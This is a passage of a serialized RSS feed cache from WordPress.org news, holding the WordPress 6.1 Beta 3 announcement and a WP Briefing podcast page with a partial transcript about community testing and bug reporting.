Available\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"https://wordpress.org/news/2022/10/wordpress-6-1-beta-3-now-available/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 04 Oct 2022 17:55:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"6.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:11:\"development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13555\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:104:\"WordPress 6.1 Beta 3 is now available for download and testing.\n \nLearn how you can help test WordPress!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Dan Soschin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:5709:\"\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p><strong><em>WordPress 6.1 Beta 3 is now available for download and testing.</em></strong></p>\n\n\n\n<p><strong>This version of the WordPress software is under development</strong>. Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test Beta 3 on a test server and site.&nbsp;</p>\n\n\n\n<p>You can test WordPress 6.1 Beta 3 in three ways:</p>\n\n\n\n<p><strong>Option 1: </strong>Install and activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (select the “Bleeding edge” channel and “Beta/RC Only” stream).</p>\n\n\n\n<p><strong>Option 2: </strong>Direct download the <a href=\"https://wordpress.org/wordpress-6.1-beta3.zip\">Beta 3 version (zip)</a>.</p>\n\n\n\n<p><strong>Option 3:</strong> Use the following WP-CLI command:</p>\n\n\n\n<p><code>wp core update --version=6.1-beta3</code></p>\n\n\n\n<p>The current target for the final release is November 1, 2022, which is about four weeks away.&nbsp;</p>\n\n\n\n<p>Additional information on the <a href=\"https://make.wordpress.org/core/6-1/\">6.1 release cycle is available</a>.</p>\n\n\n\n<p>Check the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a> for <a href=\"https://make.wordpress.org/core/tag/dev-notes+6-1/\">6.1-related developer notes</a> in the coming weeks detailing all upcoming changes.</p>\n\n\n\n<h2><strong>Keep WordPress bug-free – help with testing</strong></h2>\n\n\n\n<p>Testing for issues is critical for stabilizing a release throughout its development. Testing is also a great way to contribute. This detailed guide is an excellent start if you have never tested a beta release before.</p>\n\n\n\n<p>Testing helps ensure that this and future releases of WordPress are as stable and issue-free as possible. Anyone can take part in testing – especially great WordPress community members like you.</p>\n\n\n\n<p>Want to know more about testing releases like this one? Read about the <a href=\"https://make.wordpress.org/test/\">testing initiatives</a> that happen in Make Core. You can also join a <a href=\"https://wordpress.slack.com/messages/core-test/\">core-test channel</a> on the <a href=\"https://wordpress.slack.com/\">Making WordPress Slack workspace</a>.</p>\n\n\n\n<p>If you have run into an issue, please report it to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums. If you are comfortable writing a reproducible bug report, you can <a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>. This is also where you can find a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\n\n\n<p>To review features in the Gutenberg releases since WordPress 6.0 (the most recent major release of WordPress), access the <em>What’s New In Gutenberg</em> posts for <a href=\"https://make.wordpress.org/core/2022/09/16/whats-new-in-gutenberg-14-1-15-september/\">14.1</a>, <a href=\"https://make.wordpress.org/core/2022/09/01/whats-new-in-gutenberg-14-0-31-august/\">14.0</a>, <a href=\"https://make.wordpress.org/core/2022/08/17/whats-new-in-gutenberg-13-9-17-august/\">13.9</a>, <a href=\"https://make.wordpress.org/core/2022/08/04/whats-new-in-gutenberg-13-8-3-august/\">13.8</a>, <a href=\"https://make.wordpress.org/core/2022/07/20/whats-new-in-gutenberg-13-7-20-july/\">13.7</a>, <a href=\"https://make.wordpress.org/core/2022/07/07/whats-new-in-gutenberg-13-6-6-july/\">13.6</a>, <a href=\"https://make.wordpress.org/core/2022/06/22/whats-new-in-gutenberg-13-5-22-june/\">13.5</a>, <a href=\"https://make.wordpress.org/core/2022/06/10/whats-new-in-gutenberg-13-4-8-june/\">13.4</a>, <a href=\"https://make.wordpress.org/core/2022/05/26/whats-new-in-gutenberg-13-3-0-may-25/\">13.3</a>, <a href=\"https://make.wordpress.org/core/2022/05/12/whats-new-in-gutenberg-13-2-may-11/\">13.2</a>, and <a href=\"https://make.wordpress.org/core/2022/04/28/whats-new-in-gutenberg-13-1-27-april/\">13.1</a>.</p>\n\n\n\n<p>This release contains more than 350 enhancements and 350 bug fixes for the editor, including more than <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;milestone=6.1&amp;group=component&amp;max=500&amp;col=id&amp;col=summary&amp;col=owner&amp;col=type&amp;col=priority&amp;col=component&amp;col=version&amp;order=priority\">300 tickets for WordPress 6.1 core</a>. More fixes are on the way in the remainder of the 6.1 release cycle.</p>\n\n\n\n<h2><strong>Some highlights</strong></h2>\n\n\n\n<p><em>Want to know what’s new in version 6.1? </em><a href=\"https://wordpress.org/news/2022/09/wordpress-6-1-beta-1-now-available/\"><em>Read the initial Beta 1 announcement</em></a><em> for some details, or check out the </em><a href=\"https://make.wordpress.org/core/2022/09/14/6-1-product-walk-through-recap/\"><em>product walk-through recording</em></a><em>.</em></p>\n\n\n\n<h2><strong>What’s new in Beta 3</strong></h2>\n\n\n\n<p>Nearly 100 issues have been resolved since Beta 2 was released last week. </p>\n\n\n\n<ul>\n<li><a href=\"https://github.com/WordPress/gutenberg/commits/wp/6.1\">Github tickets</a></li>\n\n\n\n<li><a href=\"https://core.trac.wordpress.org/query?status=accepted&amp;status=closed&amp;changetime=09%2F27%2F2022..10%2F04%2F2022&amp;resolution=fixed&amp;milestone=6.1&amp;col=id&amp;col=summary&amp;col=status&amp;col=milestone&amp;col=owner&amp;col=type&amp;col=priority&amp;order=id\">Trac tickets</a> (may include some overlap with Github)</li>\n</ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<h2>A Beta 3 haiku for thee</h2>\n\n\n\n<p>Beta time done soon<br>Gather up your WordPress sites<br>RC then we ship</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13555\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:61:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"WP Briefing: Episode 40: All Things Testing with Special Guests Anne McCarthy and Brian Alexander\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:119:\"https://wordpress.org/news/2022/10/episode-40-all-things-testing-with-special-guests-anne-mccarthy-and-brian-alexander/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 03 Oct 2022 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:7:\"Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=13551\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:171:\"On this week\'s episode of the WP Briefing, Josepha is joined by special guests Anne McCarthy and Brian Alexander to discuss all thing testing within the WordPress project!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:51:\"https://wordpress.org/news/files/2022/09/WPB040.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Santana Inniss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:36698:\"\n<p>In the fortieth episode of the WordPress Briefing, Josepha Haden Chomphosy sits down with special guests Anne McCarthy and Brian Alexander to discuss the Testing Team and how to get started with testing in the WordPress project. </p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<p>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a><br>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/javiarce/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/javiarce/\">Javier Arce</a><br>Production:&nbsp;<a href=\"https://profiles.wordpress.org/santanainniss/\">Santana Inniss</a><br>Song: Fearless First by Kevin MacLeod </p>\n\n\n\n<h2>Guests</h2>\n\n\n\n<p><a href=\"https://profiles.wordpress.org/annezazu/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/annezazu/\">Anne McCarthy</a><br><a href=\"https://profiles.wordpress.org/ironprogrammer/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/ironprogrammer/\">Brian Alexander</a></p>\n\n\n\n<h2>References</h2>\n\n\n\n<p><a href=\"https://make.wordpress.org/test/2022/09/21/help-test-wordpress-6-1/\">WordPress 6.1 Testing</a><br><a href=\"https://make.wordpress.org/test/handbook/test-reports/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/test/handbook/test-reports/\">Testing Reports w/ Template</a><br><a href=\"https://make.wordpress.org/test/category/week-in-test/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/test/category/week-in-test/\">Week in Test Series</a><br><a href=\"https://make.wordpress.org/core/handbook/testing/reporting-bugs/\">Reporting Bugs Handbook Page</a><br><a href=\"https://make.wordpress.org/test/handbook/full-site-editing-outreach-experiment/\">Fullsite Editing Outreach Program</a><br><a href=\"https://wordpress.slack.com/archives/C015GUFFC00\">FSE Outreach Experiment Slack Channel</a><br><a href=\"http://make.worpress.org/test\">make.wordpress.org/test</a><br><a href=\"https://wordpress.org/news\">WordPress.org/news</a><br><a href=\"http://learn.wordpress.org\">Learn.wordpress.org</a><br><a href=\"https://www.eventbrite.com/e/wordpress-wpdiversity-speaker-workshop-for-women-voices-in-latin-america-tickets-361213468207\">#WPDiversity Speaker Workshop for Women Voices in Latin America</a></p>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-13551\"></span>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:00]&nbsp;</strong></p>\n\n\n\n<p>Hello everyone. And welcome to the WordPress Briefing, the podcast where you can catch quick explanations of some of the ideas behind the WordPress open source project and the community around it, as well as get a small list of big things coming up in the next two weeks. I&#8217;m your host, Josepha Haden Chomphosy.</p>\n\n\n\n<p>Here we go.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:42]&nbsp;</strong></p>\n\n\n\n<p>So I have with us today on the WordPress Briefing a couple of special guests. I have <a href=\"https://profiles.wordpress.org/ironprogrammer/\">Brian Alexander</a>, as well as <a href=\"https://profiles.wordpress.org/annezazu/\">Anne McCarthy</a>. I&#8217;m gonna ask you both to tell us a little bit about yourselves, if you can tell us what you do with the WordPress project, maybe how long you&#8217;ve been with WordPress, and if there are any particular teams that you contribute to, that would be great.&nbsp;</p>\n\n\n\n<p>Brian, why don&#8217;t you get us started?</p>\n\n\n\n<p><strong>[Brian Alexander 00:01:02]&nbsp;</strong></p>\n\n\n\n<p>Hi, I&#8217;m Brian. I work on the WordPress project as a full-time contributor, sponsored by Automattic. And I am one of the Test Team reps, so I help promote testing across the project. And that&#8217;s not just in Core, but it could be for Themes, Performance, feature plugins, what have you. So try to make that stuff move forward and wrangle as many people as we can to get on board and help.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:01:32]&nbsp;</strong></p>\n\n\n\n<p>Excellent. All right, and Anne, what about you?</p>\n\n\n\n<p><strong>[Anne McCarthy 00:01:36]&nbsp;</strong></p>\n\n\n\n<p>I spearhead the Full Site Editing outreach program. I am a sponsor contributor for Automattic as well, and so I contribute across a couple of different teams depending upon what the outreach program needs as well as various release squads I have been a part of. So for 6.1 coming up, I&#8217;m one of the co-Core Editor triage leads.&nbsp;</p>\n\n\n\n<p>Brian is also on the squad as the co-Test lead, which is very exciting. So it&#8217;s been fun to work with him and be on the podcast. And I&#8217;ve been around the WordPress project since about 2011. But this is, the last couple of years, the first time I&#8217;ve been able to be sponsored by Automattic and be a part of giving back to the community that&#8217;s given me so much.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:02:13]&nbsp;</strong></p>\n\n\n\n<p>Amazing. All right. For folks who&#8217;ve been listening to the WP Briefing for a while, you know that I&#8217;ve been saying for like a full year that I think that testing is one of the best onboarding opportunities we have. And then also I really like to bring in our co-creators of WordPress through that testing program. Because we don&#8217;t know whether we&#8217;re right or not unless people tell us that we&#8217;re right or not. And we would like to hear so much from the users who, you know, use it and don&#8217;t necessarily have an opportunity, that privilege to kind of build on it or build the CMS itself.</p>\n\n\n\n<p>So I just have a few questions since I&#8217;ve got a couple of our strong testing wranglers here. The first thing I have is what are you doing? Or, do you have any advice for getting people outside of our active contributor base and the community to participate in testing?</p>\n\n\n\n<p><strong>[Anne McCarthy 00:03:03]</strong>&nbsp;</p>\n\n\n\n<p>I can kick this off. Just thinking about the Full Site Editing outreach program model. So just for context, there are various calls for testing in different formats. So everything from really procedural where you&#8217;re following exact steps to follow, to very open-ended calls for testing, as well as we recently did usability testing.</p>\n\n\n\n<p>And one of the things that come to mind immediately just for getting different contributors is to have very specific, fun, engaging, relevant tests that can draw people in. So if you have a call for testing that really speaks to someone, they might be more willing to participate. As well as just different formats.</p>\n\n\n\n<p>So someone may not want to, you know, follow 30 steps, but they might want to follow something more open-ended. They might want to answer a survey rather than opening a GitHub link. And so I think a lot of facilitation with the outreach program has served us really well to bring in different folks as well as explicitly reaching out.</p>\n\n\n\n<p>So I&#8217;ve done a number of talks in different WordPress related spaces and non-WordPress spaces to try to tell people about what we&#8217;re up to and really go meet them where they are. Because I think that&#8217;s ultimately, especially with Covid and the pandemic, there was a really unique opportunity to do that and to join the random online meetup that was happening and talk about the program and talk about ways that people could get involved and feel heard.&nbsp;</p>\n\n\n\n<p><strong>[Anne McCarthy 00:04:12]</strong>&nbsp;</p>\n\n\n\n<p>And the last thing I&#8217;ll mention is translations. The program that&#8217;s culture testing that I write is written in English, but I&#8217;m very fortunate to have people who translate those. And so that&#8217;s a huge way that I cannot contribute but that other people have. And so I really want to highlight that and call that out because it&#8217;s been hugely impactful to have these calls for testing in a way that people can more readily access.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:04:32]&nbsp;</strong></p>\n\n\n\n<p>Yeah, absolutely.</p>\n\n\n\n<p><strong>[Brian Alexander 00:04:35]&nbsp;</strong></p>\n\n\n\n<p>Yeah, I was going to add in, in addition to the calls for testing that are, as Anne said, structured such to isolate so that someone can just kind of go through a list of steps to do rather than just being exposed to Trac or GitHub and have kind of snow blindness with, with everything that&#8217;s happening.</p>\n\n\n\n<p>We also have a Week in Test series of posts that goes out about every week. And what we try to do with that series is to curate a list of posts that might be a good starting point. So we try to find one that, in each type of testing example, is something that would, a more novice contributor might be able to start with. Things for more intermediate and then also advanced ones that, for testers who may need to have a development environment and the ability to make some pretty deep or type of customizations to their WordPress project in order to test a patch or reproduce a particular issue that might be happening.</p>\n\n\n\n<p>So that&#8217;s a good springboard for someone to come in where there&#8217;s just a small thing that they can kind of look at and then dive into the larger process.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:05:46]&nbsp;</strong></p>\n\n\n\n<p>Absolutely. That&#8217;s very smart. It&#8217;s hard to figure out how to get started in WordPress at all, let alone as a contributing by testing things sort of area. That feels new to WordPress even though the team has been around for a long time. And so I think that&#8217;s excellent.&nbsp;</p>\n\n\n\n<p>Brian, you mentioned in your note about who you are and what you&#8217;re doing that you&#8217;re helping with testing not only in the test section in the Test Team but then also across the project. So, I have a follow-up question for you. What can developers do to create better tests for their software?</p>\n\n\n\n<p><strong>[Brian Alexander 00:06:18]</strong>&nbsp;</p>\n\n\n\n<p>There are sections within the Core handbook that kind of go into detail about the types of tests that should accompany individual contributions. A lot of those require kind of an extra step, and some developers maybe don&#8217;t have as much experience there. So hopefully, the Core handbook can provide a little bit of that guidance.</p>\n\n\n\n<p>We also have a lot of contributors who are interested in things such as unit testing, E2E testing, which is end-to-end testing, and testing in JavaScript or in PHP. So there&#8217;s a wide variety of the types of tests that you can actually contribute to. And I would say maybe about 50% of the tickets that I&#8217;ve triaged, personally, the contributor who brought in the patch was unable to or was not familiar with providing unit tests. So that is a very good opportunity for someone to come in who maybe is not as well versed in the depth of what the patch was involved with. But by contributing a user test, they get an opportunity to look very focused at a particular piece of code, what was modified, and then create unit tests based on that.</p>\n\n\n\n<p><strong>[Brian Alexander 00:07:40]</strong>&nbsp;</p>\n\n\n\n<p>And then once that unit test has been submitted and starting to be reviewed, other reviewers, Core contributors, or Core committers, I would say, they&#8217;ll start looking at that and if there are additional details that should be there, expanding the tests or little modifications. Then that also is feedback to that test contributor so that the next time they come in, they&#8217;re more prepared for it. They&#8217;re learning more about Core, and eventually, maybe they&#8217;ll also become a Core contributor.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:08:07]</strong>&nbsp;</p>\n\n\n\n<p>Excellent. We will include links to these handbook pages and documentation in the show notes if you&#8217;re listening to the podcast on your favorite podcasting platform, Pocketcasts, or it&#8217;s somewhere else. I don&#8217;t know where people listen to podcasts, but if you&#8217;re listening to it somewhere that&#8217;s not on the website, you can come to get that on wordpress.org/news.</p>\n\n\n\n<p>Okay, the next question that I have, and I think this is for both of you, Brian, it sounds like you partially answered it, but I bet there are more answers from Anne as well. What advice do you have for those submitting bug reports?</p>\n\n\n\n<p><strong>[Anne McCarthy 00:08:38]</strong>&nbsp;</p>\n\n\n\n<p>I&#8217;ll chime in to start, and then Brian, I&#8217;d love to hear your unique take because I also think you do an excellent job whenever I&#8217;ve engaged with you in various places of providing really good replication steps. And so I love that, and I wanna offer things specific to WordPress itself and something that I&#8217;ve noticed that&#8217;s more cultural rather than necessarily like steps to follow.</p>\n\n\n\n<p>And one of the things I&#8217;ve noticed that I think has started to come up partially with Covid is people, you know, you start talking at WordCamps or at a meetup, and a bug comes up, and you find someone who knows where to put it, and that kind of connection is has been frayed in the last couple years.</p>\n\n\n\n<p>And so one of the things I feel like I&#8217;ve been saying to a lot of different people at this unique point in time is that it doesn&#8217;t need to be perfect. Don&#8217;t let perfect be the enemy of good. And so if it means you just need to drop it in a Slack channel and you just are like, I don&#8217;t know where to put this, that&#8217;s huge.</p>\n\n\n\n<p>We need to hear from people across the project. And I just really encourage anyone, even if you don&#8217;t have the complete information or you&#8217;re not a hundred percent sure you&#8217;re afraid it&#8217;s been reported 10 times before, like, please still report it because we need those reports and also if 10 people reported it and it&#8217;s still not fixed, that also means we need to iterate.</p>\n\n\n\n<p><strong>[Anne McCarthy 00:09:40]&nbsp;</strong></p>\n\n\n\n<p>And so that&#8217;s one of the things, especially with the Full Site Editing outreach program, I feel people will message me saying, hey, I&#8217;m sure you&#8217;ve heard this a bunch, but… And sometimes I&#8217;ve never heard it at all. And I shudder to think of all the people who have not reached out or have not posted in GitHub or Trac or wherever.</p>\n\n\n\n<p>So yeah, share, and write blog posts. I think that another great way that people can give feedback is if you don&#8217;t know how to get into the depths of WordPress, writing a post and talking about it and sharing it on social media is also a great way to get attention. I read a lot of those. But as much as possible, getting to, if you can, if you&#8217;re comfortable, getting to the source where we&#8217;re able to see it in Github or Trac goes a really long way.</p>\n\n\n\n<p>And share as much as you can. And don&#8217;t worry if you can&#8217;t spend hours writing the perfect bug report, we still wanna hear from you.</p>\n\n\n\n<p><strong>[Brian Alexander 00:10:21]&nbsp;</strong></p>\n\n\n\n<p>Yeah. Building off of what Anne said, just the fact that you&#8217;re speaking out and raising an issue is a huge step for many, many people. And once, once you&#8217;ve actually done that, as Anne said, it doesn&#8217;t need to be perfect. There are a lot of other people who are going to be looking at these bugs, trying to figure out the replication steps used.</p>\n\n\n\n<p>So even if you can&#8217;t provide all this detail up front, someone will help. On the back end, they&#8217;ll help kind of fill in those gaps. If you do have the time to actually get deep into providing a very detailed bug report, then there are some key aspects of the bug report that make it very helpful for contributors, not only testers, who should be able to reproduce the issue to validate and make sure that this isn&#8217;t something that&#8217;s unique, unique to a plugin, to a custom theme or snippet that you dropped into your functions PHP.&nbsp;</p>\n\n\n\n<p>But, also for the actual Core contributors, who then need to be able to understand what is happening so that they can fix the right thing. And some of those items are the information about your testing environment.</p>\n\n\n\n<p><strong>[Brian Alexander 00:11:34]&nbsp;</strong></p>\n\n\n\n<p>So that could be your browser, your server, the type, whether it&#8217;s Apache, Nginx, et cetera, the operating system you&#8217;re running, what version of PHP you&#8217;re running, the version of WordPress, very critical, and…&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:11:49]</strong>&nbsp;</p>\n\n\n\n<p>Super important.</p>\n\n\n\n<p><strong>[Brian Alexander 00:11:51]&nbsp;</strong></p>\n\n\n\n<p>Any themes and plugins that you&#8217;re using. And that kind of information helps set the stage, and then other people will be able to set up their environment similarly if they&#8217;re going to try to test it.</p>\n\n\n\n<p>After you have provided the environmental information, the steps required to reproduce the issue should be as detailed as possible. You may not have realized that clicking this caused such and such to happen, so just try to remember, or maybe even walk through if it&#8217;s something you can repeat multiple times, walk through a couple of times and write down everything that you&#8217;re doing.</p>\n\n\n\n<p><strong>[Brian Alexander 00:12:30]&nbsp;</strong></p>\n\n\n\n<p>So that you&#8217;re sure, hey, this is the way that I can reproduce this bug. And then those steps will be very helpful for other contributors when they&#8217;re reviewing it. And then it&#8217;s also very helpful if you have video, screenshots, debug logs, any of those other kinds of resources that you could refer to because not all bugs are easy to explain.</p>\n\n\n\n<p>And we tend to… Trac and GitHub issues for the Gutenberg project, everybody&#8217;s writing in English. And maybe your main language is not English, and it might be a little bit challenging to do that. So providing a video, it&#8217;s worth a thousand words in any language. So, if you can provide those types of assets, that&#8217;s also very important.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:13:22]&nbsp;</strong></p>\n\n\n\n<p>Yeah, and I&#8217;ll share a little bit of a you&#8217;re-not-alone-in-it sort of anecdotes from the first few bugs that I ever filed for WordPress. I sort of had this feeling that if I were to file a bug, everyone would know that I wasn&#8217;t a developer. And like everyone knows, I&#8217;m not a developer, but a little bit I was like, they&#8217;ll know now. And so if that&#8217;s where you are also,&nbsp; Anne said it, and Brian said it as well, like, we can&#8217;t fix things that we don&#8217;t realize are broken. And just because you&#8217;ve run into it 15 times, which obviously should never happen, you should run into it once, and then we know, but it happens.</p>\n\n\n\n<p>If you run into it 15 times, probably other people have as well. And if it&#8217;s still not fixed, it might be because no one has thought to themselves I should tell someone that&#8217;s broken. And so if that&#8217;s your primary hurdle, folks out there in our listening space, I was once there too. And honestly, knowing that it&#8217;s a problem is as valuable as knowing the solution to it most of the time.&nbsp;</p>\n\n\n\n<p><strong>[Brian Alexander 00:14:23]</strong>&nbsp;</p>\n\n\n\n<p>Yeah, and those are, I wanted to add, there is a lot to that to remember. That&#8217;s a lot to remember in terms of what you should be submitting, what, or I should say, what would be ideal in what you&#8217;re submitting. But luckily, in the test handbook, there&#8217;s a test report section, and it includes a description, it goes everything from, it starts with why we do bug reports to examples of the types of testing, whether it be for bugs or enhancements, which also need testing, and it has templates in there that you can copy and paste directly into Trac. And that&#8217;s very helpful.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:15:03]</strong></p>\n\n\n\n<p>Yeah,, we will have links to those in the show notes as well. Since we&#8217;re right there at that moment, what do you think we could do as WordPress to make reporting problems easier?</p>\n\n\n\n<p><strong>[Brian Alexander 00:15:15]</strong>&nbsp;</p>\n\n\n\n<p>I know that this has been something that&#8217;s come up during our weekly meetings, discussions on the Core test channel, as well as in contributor day test table discussions. And the test documentation that&#8217;s on the website is a little bit fragmented. I believe that the current test handbook was originally written for a type of flow analysis and feedback testing that is not the norm today. So it&#8217;s a little bit confusing. The terminology is a little dated, and the most recent updates that have been provided on there relate solely to Gutenberg, which is very important that that also be represented, but, in order to find information about testing and Trac or PHP unit tests, you have to go over to the core handbook.</p>\n\n\n\n<p>So we could definitely make things improved by consolidating, bringing everything into one area so that if you are interested in testing, you&#8217;ll have everything in one place and not be split between that and not have outdated methodologies that are asking you to submit videos that nobody&#8217;s going to really look at because we&#8217;re not doing the flow tests anymore. So I think that that would be a benefit to future testers.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:16:41]</strong>&nbsp;</p>\n\n\n\n<p>Anne, any thoughts?</p>\n\n\n\n<p><strong>[Anne McCarthy 00:16:43]</strong></p>\n\n\n\n<p>Yeah. I&#8217;ll also add that I think there are like two things we can do. One is, there&#8217;s so much happening in the WordPress project in such a cool way that I think the more we can write targeted tests and talk to people about, like, hey, here&#8217;s this new thing coming. This is a high-impact area to test. It&#8217;s under active iteration. You&#8217;re gonna get a lot of engagement. People are really thinking about this and pulling people into that where you kind of get the momentum of getting the feedback in right when someone needs it.&nbsp;</p>\n\n\n\n<p>I think we could do that a bit more to make reporting problems easier because it&#8217;s kind of like you&#8217;re in the thick of it with a lot of people rather than maybe exploring an area where someone hasn&#8217;t looked at it in a minute.</p>\n\n\n\n<p>So that’s the thing that comes to mind is just the more we can take the 